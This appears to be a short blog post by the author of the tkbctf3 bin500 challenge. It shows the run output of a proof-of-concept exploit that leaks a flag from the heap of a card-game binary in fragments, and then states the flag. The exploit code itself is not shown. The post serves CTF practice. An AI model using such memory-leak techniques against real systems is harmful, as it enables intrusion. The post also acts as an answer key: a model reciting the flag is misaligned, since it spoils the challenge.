読者です 読者をやめる 読者になる 読者になる

PoC for tkbctf3 bin500

I'm the author of tkbctf3 bin500. Here is a PoC and files :)

archive/tkbctf3/bin500_game

output:

% ../poc.py 0
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000428
[*] cards:              [b'C7', b'C7', b'CX', b'CX', b'CX', b'CX']
[*] decoded flag:       bytearray(b'  ####')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000478
[*] cards:              []
[*] decoded flag:       bytearray(b'')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000430
[*] cards:              [b'C7', b'C7', b'CX', b'CX', b'CX', b'CX']
[*] decoded flag:       bytearray(b'  ####')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000458
[*] cards:              [b'he 1st card to open\r\n', b'rdinate of the 1st card to open\r\n', b'**', b'the coordinate of the 2nd card to open\r\n', b'HJ', b'e of
the 1st card to open\r\n']
[*] decoded flag:       bytearray(b'PL4Y1N')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000490
[*] cards:              []
[*] decoded flag:       bytearray(b'')

% ../poc.py 6
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000498
[*] cards:              []
[*] decoded flag:       bytearray(b'')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000458
[*] cards:              [b'CX', b'CX', b'C7', b'C7', b'CX', b'CX']
[*] decoded flag:       bytearray(b'##  ##')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000488
[*] cards:              []
[*] decoded flag:       bytearray(b'')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000488
[*] cards:              [b'CX', b'CX', b'C7', b'C7', b'CX', b'CX']
[*] decoded flag:       bytearray(b'##  ##')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000480
[*] cards:              [b'\r\n', b'the 2nd card to open\r\n', b'Input the coordinate of the 2nd card to open\r\n', b'HJ', b' like concentration game?\r\n', b'np
ut the coordinate of the 1st card to open\r\n']
[*] decoded flag:       bytearray(b'G_W17H')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000410
[*] cards:              []
[*] decoded flag:       bytearray(b'')

% ../poc.py 12
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000478
[*] cards:              [b'the 2nd card to open\r\n', b'nput the coordinate of the 1st card to open\r\n', b'HK', b'HK', b'HK', b'HK']
[*] decoded flag:       bytearray(b'_H3333')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   000003e8
[*] cards:              []
[*] decoded flag:       bytearray(b'')

% ../poc.py 18
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   00000468
[*] cards:              [b'HK', b'**', b'he 1st card to open\r\n', b'SJ', b'S1', b'S1']
[*] decoded flag:       bytearray(b'34P\n\x00\x00')
[*] answering to 5 questions to load flag into heap...
[*] position of flag:   000003d8
[*] cards:              []
[*] decoded flag:       bytearray(b'')

flag:

What is the flag?
PL4Y1NG_W17H_H333334P